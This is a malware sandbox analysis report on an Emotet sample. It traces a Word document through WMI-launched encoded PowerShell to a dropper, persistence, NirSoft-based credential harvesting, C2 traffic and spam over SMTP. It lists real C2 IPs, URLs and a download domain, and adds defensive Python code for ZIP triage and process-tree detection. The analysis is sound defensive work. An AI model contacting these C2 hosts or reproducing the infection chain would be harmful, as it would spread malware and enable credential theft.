| Field | Value |
|---|---|
| File name | sample.zip |
| Full analysis | https://app.any.run/tasks/ce4886aa-3059-4eea-80d3-ce000c67ee07 |
| Verdict | Malicious activity |
| Threats | Emotet: a modular trojan that started as a banking trojan and evolved into a loader for other malware. It is spread by mass spam campaigns carrying malicious Office documents; most victims are organisations, but private users are infected by the same campaigns. |
| Analysis date | October 14, 2019, 17:54:03 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | 2681A6BED0DFCE8D0441E54FB0D357B4 |
| SHA1 | 65A307AD87FB2D2C30E11E56781DA82F9DA7BD6E |
| SHA256 | 52531D2E32E21C3109BEB074098D98AB7807CD130832E69264820A7F1BABE6CB |
| SSDEEP | 3072:sKH+r9M6V615mqUCt3ImFOxpl/BLJOxAG1LQOyu66BFhaE:s5rG6V67l1VFcBlIAG1LQOyu66p5 |
Static information (ZIP local file header of the single entry):

| Field | Value |
|---|---|
| Type | .zip, ZIP compressed archive (100) |
| ZipRequiredVersion | 788 (0x0314; the low byte 0x14 is version 2.0, matching "at least v2.0 to extract" above) |
| ZipBitFlag | 0x0001 (bit 0 of the general-purpose flag is the encryption bit: the entry is marked password-protected, so a scanner without the password sees only these header fields, not the document) |
| ZipCompression | Deflated |
| ZipModifyDate | 2019:10:14 17:53:14 |
| ZipCRC | 0x129ffde9 |
| ZipCompressedSize | 138713 |
| ZipUncompressedSize | 237056 |
| ZipFileName | 1dee09b40f84fedce8227e251073f269971a16e39e75af46c3658f0802c828f3.bin |

The archive entry is named after a SHA256 digest with a .bin extension; the process table below shows the document was opened from the Desktop as hero.doc.
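The header fields above can be read straight from the archive bytes, which is how a mail gateway or triage script decides whether an attachment can be inspected at all. The following is an added example, not code from ANY.RUN or from this report: a parser for ZIP local file headers that decodes the same fields the table lists (version needed, bit flag with the encryption bit, compression method, DOS timestamp, CRC-32, sizes, entry name) and a small triage pass on top. The archive it runs on is constructed in memory; the entry name `hero.doc` and its content are made up, and the encryption bit is set by patching the flag byte rather than by real encryption, only to reproduce the flag value 0x0001 seen in the report.

```python
"""Static triage of a ZIP archive from its local file headers, without extracting."""
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"
# signature, version needed, flag, method, mod time, mod date, crc32,
# compressed size, uncompressed size, name length, extra length
LOCAL_FMT = "<4sHHHHHIIIHH"
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30 bytes, fixed part of the header
FLAG_ENCRYPTED = 0x0001        # bit 0: entry is encrypted (password-protected)
FLAG_DATA_DESCRIPTOR = 0x0008  # bit 3: CRC/sizes follow the data, header holds zeros
FLAG_UTF8 = 0x0800             # bit 11: name is UTF-8 rather than CP437
METHODS = {0: "Stored", 8: "Deflated", 12: "BZIP2", 14: "LZMA", 99: "AES"}
ABUSED_TYPES = (".exe", ".scr", ".js", ".vbs", ".doc", ".docm", ".xls", ".xlsm")


def dos_datetime(mdate: int, mtime: int) -> str:
    """Decode the MS-DOS date/time pair into the exiftool-style string."""
    return "%04d:%02d:%02d %02d:%02d:%02d" % (
        1980 + (mdate >> 9), (mdate >> 5) & 0xF, mdate & 0x1F,
        mtime >> 11, (mtime >> 5) & 0x3F, (mtime & 0x1F) * 2)


def parse_local_headers(data: bytes) -> list:
    """Walk the local file headers in order and decode each one."""
    entries, off = [], 0
    while data.startswith(LOCAL_SIG, off):
        (_, ver, flag, method, mtime, mdate, crc, csize, usize,
         nlen, xlen) = struct.unpack_from(LOCAL_FMT, data, off)
        raw_name = data[off + LOCAL_LEN: off + LOCAL_LEN + nlen]
        entries.append({
            "name": raw_name.decode("utf-8" if flag & FLAG_UTF8 else "cp437"),
            "required_version": "%d.%d" % divmod(ver & 0xFF, 10),
            "bit_flag": "0x%04x" % flag,
            "encrypted": bool(flag & FLAG_ENCRYPTED),
            "compression": METHODS.get(method, "unknown(%d)" % method),
            "modify_date": dos_datetime(mdate, mtime),
            "crc32": "0x%08x" % crc,
            "compressed_size": csize,
            "uncompressed_size": usize,
        })
        if flag & FLAG_DATA_DESCRIPTOR:
            break  # sizes live only in a trailing descriptor; use the central directory then
        off += LOCAL_LEN + nlen + xlen + csize
    return entries


def triage(data: bytes) -> list:
    """Warnings a reviewer wants before anyone double-clicks the archive."""
    warnings = []
    for e in parse_local_headers(data):
        if e["encrypted"]:
            warnings.append("%s: encrypted entry, content cannot be scanned without the password" % e["name"])
        if e["name"].lower().endswith(ABUSED_TYPES):
            warnings.append("%s: executable or macro-capable payload type" % e["name"])
    return warnings


def build_sample(entry_name: str, payload: bytes, mark_encrypted: bool = False) -> bytes:
    """Constructed test archive (not the real sample). With mark_encrypted the
    encryption bit of the first local header is set; the data is NOT encrypted,
    only the flag value is reproduced so the parser can be exercised on it."""
    buf = io.BytesIO()
    info = zipfile.ZipInfo(entry_name, date_time=(2019, 10, 14, 17, 53, 14))
    info.compress_type = zipfile.ZIP_DEFLATED
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(info, payload)
    data = bytearray(buf.getvalue())
    if mark_encrypted:
        data[6] |= FLAG_ENCRYPTED  # general-purpose flag is at offset 6 of the header
    return bytes(data)


if __name__ == "__main__":
    for entry in parse_local_headers(build_sample("hero.doc", b"constructed", True)):
        for k, v in entry.items():
            print("%-18s %s" % (k, v))
    print(triage(build_sample("hero.doc", b"constructed", True)))
```

Run it on a real file with `parse_local_headers(open(path, "rb").read())`. The parser stops at the first entry that uses a data descriptor, because then the sizes in the local header are zero and the next header cannot be located without the central directory; for triage that is the safe choice over guessing.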
Processes (all ran as user admin at MEDIUM integrity; no per-process indicators were recorded; the PowerShell command line is elided in the report):

| PID | Command line | Path | Parent process | Company | Description | Version | Exit code |
|---|---|---|---|---|---|---|---|
| 2168 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | Alexander Roshal | WinRAR archiver | 5.60.0 | — |
| 2952 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\hero.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | Microsoft Corporation | Microsoft Word | 14.0.6024.1000 | — |
| 2744 | powershell -e <base64-encoded command elided> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | Microsoft Corporation | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 3932 | "C:\Users\admin\968.exe" | C:\Users\admin\968.exe | powershell.exe | — | DirectoryBrowse MFC Application | 1, 0, 0, 1 | 0 |
| 2816 | --d55991b9 | C:\Users\admin\968.exe | 968.exe | — | DirectoryBrowse MFC Application | 1, 0, 0, 1 | 0 |
| 2140 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | 968.exe | — | DirectoryBrowse MFC Application | 1, 0, 0, 1 | 0 |
| 3972 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | — | DirectoryBrowse MFC Application | 1, 0, 0, 1 | — |
| 3980 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" /scomma "C:\Users\admin\AppData\Local\Temp\E6EB.tmp" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | — | DirectoryBrowse MFC Application | 1, 0, 0, 1 | 0 |

What the table shows: the archive is opened in WinRAR and the document in Word. The encoded PowerShell command is started with wmiprvse.exe as parent, not WINWORD.EXE, so the launch went through WMI and any detection keyed on an Office process spawning PowerShell will not see a parent-child link here. PowerShell's only network contact is shreeumiyagroup.com (connections table below), after which it launches 968.exe from the root of the user profile. 968.exe relaunches itself with a random-looking hex argument (--d55991b9), installs a copy as %LOCALAPPDATA%\msptermsizes\msptermsizes.exe, and the copy repeats the same self-relaunch (--f91b2738); that instance, PID 3972, is the one that produces all the C2 and SMTP traffic. The final instance runs with /scomma writing to a .tmp file in Temp: /scomma is the NirSoft command-line switch for exporting results to CSV, and Emotet's credential- and mail-harvesting modules are built on NirSoft recovery tools invoked exactly this way. The "DirectoryBrowse MFC Application" description and 1, 0, 0, 1 version come from the dropper's own version resource and carry no meaning.
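Reconstructing this chain from endpoint telemetry is a matter of a few structural rules rather than file hashes, since the dropper's name, path and hex argument change per sample. The block below is an added example and not code from ANY.RUN or from the report: it builds a process tree from Sysmon-style records and emits the findings a SOC analyst would want for this sample (encoded PowerShell parented by wmiprvse.exe while an Office process is present, PowerShell launching an executable from the user profile, a process relaunching its own image with a lone --hex argument, a copy installed under AppData\Local\<name>\<name>.exe, and a /scomma export). The records are constructed from the process table above; the parent PIDs, and the PIDs of explorer.exe and wmiprvse.exe, are assumptions because the report names parents without PIDs, and `FAKE_ENCODED` is a harmless stand-in for the encoded command the report elides.

```python
"""Process-tree triage for the Word -> WMI -> PowerShell -> dropper chain."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e[ncodema]*\s+([A-Za-z0-9+/=]+)")
SELF_RELAUNCH_ARG = re.compile(r"^--[0-9a-f]{8}$")


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


# Constructed from the report's process table. Parent PIDs and the PIDs of
# explorer.exe / wmiprvse.exe are assumed; FAKE_ENCODED replaces the elided blob.
FAKE_ENCODED = base64.b64encode("$x = 1".encode("utf-16-le")).decode()
MSP = r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"
SAMPLE = [
    Proc(1220, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(2952, 1220, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\hero.doc"'),
    Proc(1560, 600, r"C:\Windows\System32\wbem\wmiprvse.exe", "wmiprvse.exe"),
    Proc(2744, 1560, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -e " + FAKE_ENCODED),
    Proc(3932, 2744, r"C:\Users\admin\968.exe", r'"C:\Users\admin\968.exe"'),
    Proc(2816, 3932, r"C:\Users\admin\968.exe", "--d55991b9"),
    Proc(2140, 2816, MSP, '"%s"' % MSP),
    Proc(3972, 2140, MSP, "--f91b2738"),
    Proc(3980, 3972, MSP, '"%s" /scomma "C:\\Users\\admin\\AppData\\Local\\Temp\\E6EB.tmp"' % MSP),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    for m in ENC_ARG.finditer(cmdline):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def lineage(procs: List[Proc], pid: int) -> List[str]:
    """Image names from the oldest known ancestor down to pid."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain[::-1]


def detect(procs: List[Proc]) -> List[Tuple[str, int]]:
    """Structural findings as (rule, pid); nothing here depends on a hash or name."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        pname = parent.name if parent else ""
        in_profile = p.image.lower().startswith("c:\\users\\")
        if p.name in OFFICE_IMAGES:
            findings.append(("office_process_present", p.pid))
        if p.name == "powershell.exe" and decode_encoded_command(p.cmdline) is not None:
            rule = "wmi_spawned_encoded_powershell" if pname == "wmiprvse.exe" else "encoded_powershell"
            findings.append((rule, p.pid))
        if pname == "powershell.exe" and in_profile:
            findings.append(("powershell_runs_user_profile_exe", p.pid))
        if parent and parent.image.lower() == p.image.lower() and SELF_RELAUNCH_ARG.match(p.cmdline.strip()):
            findings.append(("self_relaunch_hex_arg", p.pid))
        stem = p.name[:-4] if p.name.endswith(".exe") else p.name
        if (parent and parent.name != p.name and in_profile
                and "\\appdata\\local\\%s\\%s.exe" % (stem, stem) in p.image.lower()):
            findings.append(("installed_copy_under_appdata_local", p.pid))
        if "/scomma" in p.cmdline.lower():
            findings.append(("nirsoft_scomma_csv_export", p.pid))
    return findings


if __name__ == "__main__":
    print(" -> ".join(lineage(SAMPLE, 3980)))
    print(decode_encoded_command(SAMPLE[3].cmdline))
    for rule, pid in detect(SAMPLE):
        print("%-36s pid %d" % (rule, pid))
```

The WMI rule deliberately does not require Word to be the parent; it pairs wmiprvse.exe as parent with the presence of an Office process, which is the shape this report shows. Feed real Sysmon event 1 records into `Proc` (ProcessId, ParentProcessId, Image, CommandLine) to run the same rules on live data.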
Files created (hashes are those recorded by the report; 968.exe and msptermsizes.exe are not in this list, so their hashes are not available on this page):

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR22FE.tmp.cvr | — | — | — |
| 2744 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\33GKAHXFAIDLLE2ES4AY.temp | — | — | — |
| 2952 | WINWORD.EXE | C:\Users\admin\Desktop\~$hero.doc | pgc | D17F055567AEFF78F20C2DCEEB3CDDDD | 02997C861BA55D9307D010A6C91863472F1ED28D6140759EF631C85928EC3F8C |
| 2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9C97F0.wmf | wmf | 9D75EE758515C000E1448CCD2C7C7EF8 | 94A247FEBE5DBF8347485CC0059BB48E0D5116DA57036B80626B50CD6BC1E156 |
| 2952 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | DF4CB057968E8A5510051549076E4859 | AE28D02BF5F757A9CB253DB9883E17A9DE86CFC8E7915FDD03C007A63CE3459F |
| 2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6DB12EB.wmf | wmf | 8825E9B760F08A27ABEFCB8BAD1A61C8 | 603F41A9AC70369290851615FD57B1EC8A49EC7A4D6EAFDB0F84E527BF9BACC0 |
| 2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CAC69AA.wmf | wmf | D80CD9865C96FC01A002C4AB2702702B | 6548B47FAEFA84C1854AAFAB99162F6362AA585A6FE112540B41AAC881DD29BD |
| 2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD5FE12.wmf | wmf | 5D6FD4A9D5777302164F272765429B40 | C7BF22B810A60ABE272FDEFC6EA676C4947694313FF8CF9DDFBE55461C68B1BC |
| 2744 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3a33a8.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
| 2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7D66C3C.wmf | wmf | 0A6ED135C474427BCC8416A2284C4E21 | 7E808A6A287638843364F795A03A14CE7C116E7163E670B87E192959AA40B066 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3972 | msptermsizes.exe | GET | — | 192.241.241.221:443 | http://192.241.241.221:443/whoami.php | US | — | — | malicious |
3972 | msptermsizes.exe | GET | — | 192.241.241.221:443 | http://192.241.241.221:443/whoami.php | US | — | — | malicious |
3972 | msptermsizes.exe | POST | 200 | 178.32.255.133:443 | http://178.32.255.133:443/merge/stubs/ | FR | binary | 148 b | malicious |
3972 | msptermsizes.exe | GET | 200 | 185.187.198.5:8080 | http://185.187.198.5:8080/whoami.php | RU | text | 14 b | malicious |
3972 | msptermsizes.exe | GET | 200 | 178.32.255.133:443 | http://178.32.255.133:443/whoami.php | FR | text | 14 b | malicious |
3972 | msptermsizes.exe | POST | 200 | 190.117.206.153:443 | http://190.117.206.153:443/merge/jit/add/merge/ | PE | binary | 148 b | malicious |
3972 | msptermsizes.exe | POST | 200 | 185.187.198.5:8080 | http://185.187.198.5:8080/balloon/ | RU | binary | 168 Kb | malicious |
3972 | msptermsizes.exe | POST | 200 | 178.32.255.133:443 | http://178.32.255.133:443/ban/ | FR | binary | 148 b | malicious |
3972 | msptermsizes.exe | POST | 200 | 190.117.206.153:443 | http://190.117.206.153:443/tlb/tlb/add/merge/ | PE | mp3 | 1.85 Mb | malicious |
3972 | msptermsizes.exe | POST | 200 | 185.187.198.5:8080 | http://185.187.198.5:8080/splash/add/ | RU | binary | 3.20 Mb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2744 | powershell.exe | 173.248.148.197:443 | shreeumiyagroup.com | Handy Networks, LLC | US | unknown |
3972 | msptermsizes.exe | 178.32.255.133:443 | — | OVH SAS | FR | malicious |
3972 | msptermsizes.exe | 185.187.198.5:8080 | — | Pravoved LLC | RU | malicious |
3972 | msptermsizes.exe | 192.241.241.221:443 | — | Digital Ocean, Inc. | US | malicious |
3972 | msptermsizes.exe | 190.117.206.153:443 | — | America Movil Peru S.A.C. | PE | malicious |
3972 | msptermsizes.exe | 203.89.134.15:465 | mail.omlogistics.co.in | OM Logistics Limited | IN | unknown |
3972 | msptermsizes.exe | 202.137.236.12:587 | smtp.rediffmailpro.com | Rediff.com India Limited | IN | unknown |
3972 | msptermsizes.exe | 188.125.73.26:587 | smtp.mail.yahoo.com | — | CH | unknown |
3972 | msptermsizes.exe | 74.125.133.109:465 | smtp.gmail.com | Google Inc. | US | whitelisted |
3972 | msptermsizes.exe | 217.74.64.236:465 | poczta.interia.pl | INTERIA.PL Sp z.o.o. | PL | unknown |
Two things in the traffic above are worth stating plainly. Every C2 request from PID 3972 is plain HTTP (http:// URLs) carried over ports 443 and 8080, which is why the IDS raises "HTTP traffic on port 443 (POST)" and why a TLS-only inspection policy misses it; the POST bodies of 148 b are check-ins and the larger responses (168 Kb, 1.85 Mb, 3.20 Mb) are downloaded modules. The connections to SMTP submission ports 465 and 587 at Gmail, Yahoo, Rediff, Interia and a logistics company's mail server are Emotet's spam module using harvested mail credentials, not anything the sandbox user did; their "unknown" or "whitelisted" reputation means a reputation-only block would not catch them.

DNS requests (the report records no resolved IP for these names):

| Domain | IP | Reputation |
|---|---|---|
| shreeumiyagroup.com | — | unknown |
| smtp.gmail.com | — | shared |
| mail.sstelecoms.com | — | unknown |
| smtp.dapda.com | — | unknown |
| mail.omlogistics.co.in | — | unknown |
| smtp.rediffmailpro.com | — | shared |
| smtp.mail.yahoo.com | — | shared |
| poczta.interia.pl | — | unknown |
| smtp.live.com | — | shared |
| imap.twomountains.co.za | — | unknown |
PID | Process | Class | Message |
---|---|---|---|
3972 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 11 |
3972 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
3972 | msptermsizes.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |